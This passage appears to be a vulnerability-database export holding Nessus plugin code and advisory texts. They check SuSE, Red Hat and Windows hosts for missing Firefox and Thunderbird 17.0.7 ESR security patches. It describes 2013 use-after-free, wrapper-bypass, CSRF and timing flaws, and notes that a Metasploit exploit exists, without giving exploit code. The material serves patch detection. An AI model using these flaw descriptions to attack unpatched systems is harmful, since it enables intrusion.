circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2013-49)\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. (CVE-2013-1682)\n\n - Security researcher Abhishek Arya (Inferno) of the\n Google Chrome Security Team used the Address Sanitizer\n tool to discover a series of use-after-free problems\n rated critical as security issues in shipped software.\n Some of these issues are potentially exploitable,\n allowing for remote code execution. We would also like\n to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code\n introduced during Firefox development. 
These were fixed\n before general release. (MFSA 2013-50)\n\n - Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITab\n le. (CVE-2013-1684)\n\n - Heap-use-after-free in nsIDocument::GetRootElement.\n (CVE-2013-1685)\n\n - Heap-use-after-free in mozilla::ResetDir.\n (CVE-2013-1686)\n\n - Security researcher Mariusz Mlynski reported that it is\n possible to compile a user-defined function in the XBL\n scope of a specific element and then trigger an event\n within this scope to run code. In some circumstances,\n when this code is run, it can access content protected\n by System Only Wrappers (SOW) and chrome-privileged\n pages. This could potentially lead to arbitrary code\n execution. Additionally, Chrome Object Wrappers (COW)\n can be bypassed by web content to access privileged\n methods, leading to a cross-site scripting (XSS) attack\n from privileged pages. (MFSA 2013-51 / CVE-2013-1687)\n\n - Security researcher Nils reported that specially crafted\n web content using the onreadystatechange event and\n reloading of pages could sometimes cause a crash when\n unmapped memory is executed. This crash is potentially\n exploitable. (MFSA 2013-53 / CVE-2013-1690)\n\n - Security researcher Johnathan Kuskos reported that\n Firefox is sending data in the body of XMLHttpRequest\n (XHR) HEAD requests, which goes against the XHR\n specification. This can potentially be used for\n Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n (MFSA 2013-54 / CVE-2013-1692)\n\n - Security researcher Paul Stone of Context Information\n Security discovered that timing differences in the\n processing of SVG format images with filters could allow\n for pixel values to be read. This could potentially\n allow for text values to be read across domains, leading\n to information disclosure. 
(MFSA 2013-55 /\n CVE-2013-1693)\n\n - Mozilla security researcher moz_bug_r_a4 reported that\n XrayWrappers can be bypassed to call content-defined\n toString and valueOf methods through DefaultValue. This\n can lead to unexpected behavior when privileged code\n acts on the incorrect values. (MFSA 2013-59 /\n CVE-2013-1697)\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-49.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-50.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-51.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-53.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-54.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-55.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://www.mozilla.org/security/announce/2013/mfsa2013-59.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://bugzilla.novell.com/show_bug.cgi?id=825935\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1682.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1684.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1685.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1686.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1687.html\"\n );\n 
script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1690.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1692.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1693.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1697.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply SAT patch number 7976.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox-branding-SLED\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:novell:suse_linux:11:MozillaFirefox-translations\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:novell:suse_linux:11\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/06\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 Tenable Network Security, Inc.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n 
script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nrelease = get_kb_item(\"Host/SuSE/release\");\nif (isnull(release) || release !~ \"^(SLED|SLES)11\") audit(AUDIT_OS_NOT, \"SuSE 11\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (cpu !~ \"^i[3-6]86$\" && \"x86_64\" >!< cpu && \"s390x\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"SuSE 11\", cpu);\n\npl = get_kb_item(\"Host/SuSE/patchlevel\");\nif (isnull(pl) || int(pl) != 2) audit(AUDIT_OS_NOT, \"SuSE 11.2\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"MozillaFirefox-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"MozillaFirefox-branding-SLED-7-0.6.9.31\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"i586\", reference:\"MozillaFirefox-translations-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"MozillaFirefox-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"MozillaFirefox-branding-SLED-7-0.6.9.31\")) flag++;\nif (rpm_check(release:\"SLED11\", sp:2, cpu:\"x86_64\", reference:\"MozillaFirefox-translations-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"MozillaFirefox-17.0.7esr-0.3.1\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"MozillaFirefox-branding-SLED-7-0.6.9.31\")) flag++;\nif (rpm_check(release:\"SLES11\", sp:2, reference:\"MozillaFirefox-translations-17.0.7esr-0.3.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) 
security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-20T15:14:23", "description": "Mozilla Firefox has been updated to the 17.0.7 ESR version, which\nfixes bugs and security fixes.\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. (MFSA 2013-49)\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. (CVE-2013-1682)\n\n - Security researcher Abhishek Arya (Inferno) of the\n Google Chrome Security Team used the Address Sanitizer\n tool to discover a series of use-after-free problems\n rated critical as security issues in shipped software.\n Some of these issues are potentially exploitable,\n allowing for remote code execution. We would also like\n to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code\n introduced during Firefox development. These were fixed\n before general release. (MFSA 2013-50)\n\n o Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITab\n le (CVE-2013-1684) o Heap-use-after-free in\n nsIDocument::GetRootElement (CVE-2013-1685) o\n Heap-use-after-free in mozilla::ResetDir.\n (CVE-2013-1686)\n\n - Security researcher Mariusz Mlynski reported that it is\n possible to compile a user-defined function in the XBL\n scope of a specific element and then trigger an event\n within this scope to run code. In some circumstances,\n when this code is run, it can access content protected\n by System Only Wrappers (SOW) and chrome-privileged\n pages. 
This could potentially lead to arbitrary code\n execution. Additionally, Chrome Object Wrappers (COW)\n can be bypassed by web content to access privileged\n methods, leading to a cross-site scripting (XSS) attack\n from privileged pages. (MFSA 2013-51 / CVE-2013-1687)\n\n - Security researcher Nils reported that specially crafted\n web content using the onreadystatechange event and\n reloading of pages could sometimes cause a crash when\n unmapped memory is executed. This crash is potentially\n exploitable. (MFSA 2013-53 / CVE-2013-1690)\n\n - Security researcher Johnathan Kuskos reported that\n Firefox is sending data in the body of XMLHttpRequest\n (XHR) HEAD requests, which goes against the XHR\n specification. This can potentially be used for\n Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n (MFSA 2013-54 / CVE-2013-1692)\n\n - Security researcher Paul Stone of Context Information\n Security discovered that timing differences in the\n processing of SVG format images with filters could allow\n for pixel values to be read. This could potentially\n allow for text values to be read across domains, leading\n to information disclosure. (MFSA 2013-55 /\n CVE-2013-1693)\n\n - Mozilla security researcher moz_bug_r_a4 reported that\n XrayWrappers can be bypassed to call content-defined\n toString and valueOf methods through DefaultValue. This\n can lead to unexpected behavior when privileged code\n acts on the incorrect values. 
(MFSA 2013-59 /\n CVE-2013-1697)", "edition": 17, "published": "2013-07-06T00:00:00", "title": "SuSE 10 Security Update : Mozilla Firefox (ZYPP Patch Number 8636)", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2013-07-06T00:00:00", "cpe": ["cpe:/o:suse:suse_linux"], "id": "SUSE_FIREFOX-20130628-8636.NASL", "href": "https://www.tenable.com/plugins/nessus/67198", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n# The text description of this plugin is (C) Novell, Inc.\n#\n\nif (NASL_LEVEL < 3000) exit(0);\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(67198);\n script_version(\"1.10\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/19\");\n\n script_cve_id(\"CVE-2013-1682\", \"CVE-2013-1684\", \"CVE-2013-1685\", \"CVE-2013-1686\", \"CVE-2013-1687\", \"CVE-2013-1690\", \"CVE-2013-1692\", \"CVE-2013-1693\", \"CVE-2013-1697\");\n\n script_name(english:\"SuSE 10 Security Update : Mozilla Firefox (ZYPP Patch Number 8636)\");\n script_summary(english:\"Checks rpm output for the updated packages\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote SuSE 10 host is missing a security-related patch.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Mozilla Firefox has been updated to the 17.0.7 ESR version, which\nfixes bugs and security fixes.\n\n - Mozilla developers identified and fixed several memory\n safety bugs in the browser engine used in Firefox and\n other Mozilla-based products. Some of these bugs showed\n evidence of memory corruption under certain\n circumstances, and we presume that with enough effort at\n least some of these could be exploited to run arbitrary\n code. 
(MFSA 2013-49)\n\n Gary Kwong, Jesse Ruderman, and Andrew McCreight\n reported memory safety problems and crashes that affect\n Firefox ESR 17, and Firefox 21. (CVE-2013-1682)\n\n - Security researcher Abhishek Arya (Inferno) of the\n Google Chrome Security Team used the Address Sanitizer\n tool to discover a series of use-after-free problems\n rated critical as security issues in shipped software.\n Some of these issues are potentially exploitable,\n allowing for remote code execution. We would also like\n to thank Abhishek for reporting additional\n use-after-free and buffer overflow flaws in code\n introduced during Firefox development. These were fixed\n before general release. (MFSA 2013-50)\n\n o Heap-use-after-free in\n mozilla::dom::HTMLMediaElement::LookupMediaElementURITab\n le (CVE-2013-1684) o Heap-use-after-free in\n nsIDocument::GetRootElement (CVE-2013-1685) o\n Heap-use-after-free in mozilla::ResetDir.\n (CVE-2013-1686)\n\n - Security researcher Mariusz Mlynski reported that it is\n possible to compile a user-defined function in the XBL\n scope of a specific element and then trigger an event\n within this scope to run code. In some circumstances,\n when this code is run, it can access content protected\n by System Only Wrappers (SOW) and chrome-privileged\n pages. This could potentially lead to arbitrary code\n execution. Additionally, Chrome Object Wrappers (COW)\n can be bypassed by web content to access privileged\n methods, leading to a cross-site scripting (XSS) attack\n from privileged pages. (MFSA 2013-51 / CVE-2013-1687)\n\n - Security researcher Nils reported that specially crafted\n web content using the onreadystatechange event and\n reloading of pages could sometimes cause a crash when\n unmapped memory is executed. This crash is potentially\n exploitable. 
(MFSA 2013-53 / CVE-2013-1690)\n\n - Security researcher Johnathan Kuskos reported that\n Firefox is sending data in the body of XMLHttpRequest\n (XHR) HEAD requests, which goes against the XHR\n specification. This can potentially be used for\n Cross-Site Request Forgery (CSRF) attacks against sites\n which do not distinguish between HEAD and POST requests.\n (MFSA 2013-54 / CVE-2013-1692)\n\n - Security researcher Paul Stone of Context Information\n Security discovered that timing differences in the\n processing of SVG format images with filters could allow\n for pixel values to be read. This could potentially\n allow for text values to be read across domains, leading\n to information disclosure. (MFSA 2013-55 /\n CVE-2013-1693)\n\n - Mozilla security researcher moz_bug_r_a4 reported that\n XrayWrappers can be bypassed to call content-defined\n toString and valueOf methods through DefaultValue. This\n can lead to unexpected behavior when privileged code\n acts on the incorrect values. 
(MFSA 2013-59 /\n CVE-2013-1697)\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-49.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-49/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-50.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-50/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-51.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-51/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-53.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-53/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-54.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-54/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-55.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-55/\"\n );\n # http://www.mozilla.org/security/announce/2013/mfsa2013-59.html\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-59/\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1682.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1684.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1685.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1686.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n 
value:\"http://support.novell.com/security/cve/CVE-2013-1687.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1690.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1692.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1693.html\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"http://support.novell.com/security/cve/CVE-2013-1697.html\"\n );\n script_set_attribute(attribute:\"solution\", value:\"Apply ZYPP patch number 8636.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:suse:suse_linux\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/28\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/07/06\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2013-2021 and is owned by Tenable, Inc. 
or an Affiliate thereof.\");\n script_family(english:\"SuSE Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/cpu\", \"Host/SuSE/release\", \"Host/SuSE/rpm-list\");\n\n exit(0);\n}\n\n\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) exit(0, \"Local checks are not enabled.\");\nif (!get_kb_item(\"Host/SuSE/release\")) exit(0, \"The host is not running SuSE.\");\nif (!get_kb_item(\"Host/SuSE/rpm-list\")) exit(1, \"Could not obtain the list of installed packages.\");\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) exit(1, \"Failed to determine the architecture type.\");\nif (cpu >!< \"x86_64\" && cpu !~ \"^i[3-6]86$\") exit(1, \"Local checks for SuSE 10 on the '\"+cpu+\"' architecture have not been implemented.\");\n\n\nflag = 0;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"MozillaFirefox-17.0.7esr-0.6.1\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"MozillaFirefox-branding-SLED-7-0.10.28\")) flag++;\nif (rpm_check(release:\"SLED10\", sp:4, reference:\"MozillaFirefox-translations-17.0.7esr-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"MozillaFirefox-17.0.7esr-0.6.1\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"MozillaFirefox-branding-SLED-7-0.10.28\")) flag++;\nif (rpm_check(release:\"SLES10\", sp:4, reference:\"MozillaFirefox-translations-17.0.7esr-0.6.1\")) flag++;\n\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:rpm_report_get());\n else security_hole(0);\n exit(0);\n}\nelse exit(0, \"The host is not affected.\");\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-04-01T04:11:00", "description": "The installed version of Thunderbird ESR 17.x is earlier than 17.0.7\nand is, therefore, potentially affected the following vulnerabilities:\n\n - Various, unspecified memory safety issues 
exist.\n (CVE-2013-1682)\n\n - Heap-use-after-free errors exist related to\n 'LookupMediaElementURITable',\n 'nsIDocument::GetRootElement' and 'mozilla::ResetDir'.\n (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\n - An error exists related to 'XBL scope', 'System Only\n Wrappers' (SOW) and chrome-privileged pages that could\n allow cross-site scripting attacks. (CVE-2013-1687)\n\n - An error related to 'onreadystatechange' and unmapped\n memory could cause application crashes and allow\n arbitrary code execution. (CVE-2013-1690)\n\n - The application sends data in the body of XMLHttpRequest\n (XHR) HEAD requests and could aid in cross-site request\n forgery attacks. (CVE-2013-1692)\n\n - An error related to the processing of SVG content could\n allow a timing attack to disclose information across\n domains. (CVE-2013-1693)\n\n - An error exists related to 'PreserveWrapper' and the\n 'preserved-wrapper' flag that could cause potentially\n exploitable application crashes. (CVE-2013-1694)\n\n - An error exists related to the 'toString' and 'valueOf'\n methods that could allow 'XrayWrappers' to be bypassed.\n (CVE-2013-1697)", "edition": 28, "published": "2013-06-26T00:00:00", "title": "Mozilla Thunderbird ESR 17.x < 17.0.7 Multiple Vulnerabilities", "type": "nessus", "bulletinFamily": "scanner", "cvelist": ["CVE-2013-1687", "CVE-2013-1692", "CVE-2013-1685", "CVE-2013-1697", "CVE-2013-1694", "CVE-2013-1690", "CVE-2013-1684", "CVE-2013-1686", "CVE-2013-1682", "CVE-2013-1693"], "modified": "2021-04-02T00:00:00", "cpe": ["cpe:/a:mozilla:thunderbird"], "id": "MOZILLA_THUNDERBIRD_1707_ESR.NASL", "href": "https://www.tenable.com/plugins/nessus/66995", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(66995);\n script_version(\"1.13\");\n script_cvs_date(\"Date: 2019/11/27\");\n\n script_cve_id(\n \"CVE-2013-1682\",\n \"CVE-2013-1684\",\n \"CVE-2013-1685\",\n \"CVE-2013-1686\",\n \"CVE-2013-1687\",\n 
\"CVE-2013-1690\",\n \"CVE-2013-1692\",\n \"CVE-2013-1693\",\n \"CVE-2013-1694\",\n \"CVE-2013-1697\"\n );\n script_bugtraq_id(\n 60765,\n 60766,\n 60773,\n 60774,\n 60776,\n 60777,\n 60778,\n 60783,\n 60784,\n 60787\n );\n\n script_name(english:\"Mozilla Thunderbird ESR 17.x < 17.0.7 Multiple Vulnerabilities\");\n script_summary(english:\"Checks version of Thunderbird ESR\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host contains a mail client that is potentially\naffected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The installed version of Thunderbird ESR 17.x is earlier than 17.0.7\nand is, therefore, potentially affected the following vulnerabilities:\n\n - Various, unspecified memory safety issues exist.\n (CVE-2013-1682)\n\n - Heap-use-after-free errors exist related to\n 'LookupMediaElementURITable',\n 'nsIDocument::GetRootElement' and 'mozilla::ResetDir'.\n (CVE-2013-1684, CVE-2013-1685, CVE-2013-1686)\n\n - An error exists related to 'XBL scope', 'System Only\n Wrappers' (SOW) and chrome-privileged pages that could\n allow cross-site scripting attacks. (CVE-2013-1687)\n\n - An error related to 'onreadystatechange' and unmapped\n memory could cause application crashes and allow\n arbitrary code execution. (CVE-2013-1690)\n\n - The application sends data in the body of XMLHttpRequest\n (XHR) HEAD requests and could aid in cross-site request\n forgery attacks. (CVE-2013-1692)\n\n - An error related to the processing of SVG content could\n allow a timing attack to disclose information across\n domains. (CVE-2013-1693)\n\n - An error exists related to 'PreserveWrapper' and the\n 'preserved-wrapper' flag that could cause potentially\n exploitable application crashes. 
(CVE-2013-1694)\n\n - An error exists related to the 'toString' and 'valueOf'\n methods that could allow 'XrayWrappers' to be bypassed.\n (CVE-2013-1697)\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-49/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-50/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-51/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-53/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-54/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-55/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-56/\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.mozilla.org/en-US/security/advisories/mfsa2013-59/\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to Thunderbird ESR 17.0.7 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2013-1686\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n script_set_attribute(attribute:\"metasploit_name\", value:'Firefox onreadystatechange Event DocumentViewerImpl Use After Free');\n script_set_attribute(attribute:\"exploit_framework_metasploit\", value:\"true\");\n script_cwe_id(20, 74, 79, 442, 629, 711, 712, 722, 725, 750, 751, 800, 801, 809, 811, 
864, 900, 928, 931, 990);\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2013/06/25\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2013/06/26\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:mozilla:thunderbird\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2013-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"mozilla_org_installed.nasl\");\n script_require_keys(\"Mozilla/Thunderbird/Version\");\n\n exit(0);\n}\n\ninclude(\"mozilla_version.inc\");\n\nport = get_kb_item_or_exit(\"SMB/transport\");\n\ninstalls = get_kb_list(\"SMB/Mozilla/Thunderbird/*\");\nif (isnull(installs)) audit(AUDIT_NOT_INST, \"Thunderbird\");\n\nmozilla_check_version(installs:installs, product:'thunderbird', esr:TRUE, fix:'17.0.7', min:'17.0', severity:SECURITY_HOLE, xss:TRUE, xsrf:TRUE);\n", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2021-01-17T12:47:59", "description": "From Red Hat Security Advisory 2013:0981 :\n\nUpdated firefox packages that fix several security issues are now\navailable for Red Hat Enterprise Linux 5 and 6.\n\nThe Red Hat Security Response Team has rated this update as having\ncritical security impact. Common Vulnerability Scoring System (CVSS)\nbase scores, which give detailed severity ratings, are available for\neach vulnerability from the CVE links in the References section.\n\nMozilla Firefox is an open source web browser. XULRunner provides the\nXUL Runtime environment for Mozilla Firefox.\n\nSeveral flaws were found in the processing of malformed web content. 
A\nweb page containing malicious content could cause Firefox to crash or,\npotentially, execute arbitrary code with the privileges of the user\nrunning Firefox. (CVE-2013-1682, CVE-2013-1684, CVE-2013-1685,\nCVE-2013-1686, CVE-2013-1687, CVE-2013-1690)\n\nIt was found that Firefox allowed data to be sent in the body of\nXMLHttpRequest (XHR) HEAD requests. In some cases this could allow\nattackers to conduct Cross-Site Request Forgery (CSRF) attacks.\n(CVE-2013-1692)\n\nTiming differences in the way Firefox processed SVG image files could\nallow an attacker to read data across domains, potentially leading to\ninformation disclosure. (CVE-2013-1693)\n\nTwo flaws were found in the way Firefox implemented some of its\ninternal structures (called wrappers). An attacker could use these\nflaws to bypass some restrictions placed on them. This could lead to\nunexpected behavior or a potentially exploitable crash.\n(CVE-2013-1694, CVE-2013-1697)\n\nRed Hat would like to thank the Mozilla project for reporting these\nissues. Upstream acknowledges Gary Kwong, Jesse Ruderman, Andrew\nMcCreight, Abhishek Arya, Mariusz Mlynski, Nils, Johnathan Kuskos,\nPaul Stone, Boris Zbarsky, and moz_bug_r_a4 as the original reporters\nof these issues.\n\nFor technical details regarding these flaws, refer to the Mozilla\nsecurity advisories for Firefox 17.0.7 ESR. You can find a link to the\nMozilla advisories in the References section of this erratum.\n\nAll Firefox users should upgrade to these updated packages, which\ncontain Firefox version 17.0.7 ESR, which corrects these issues. 
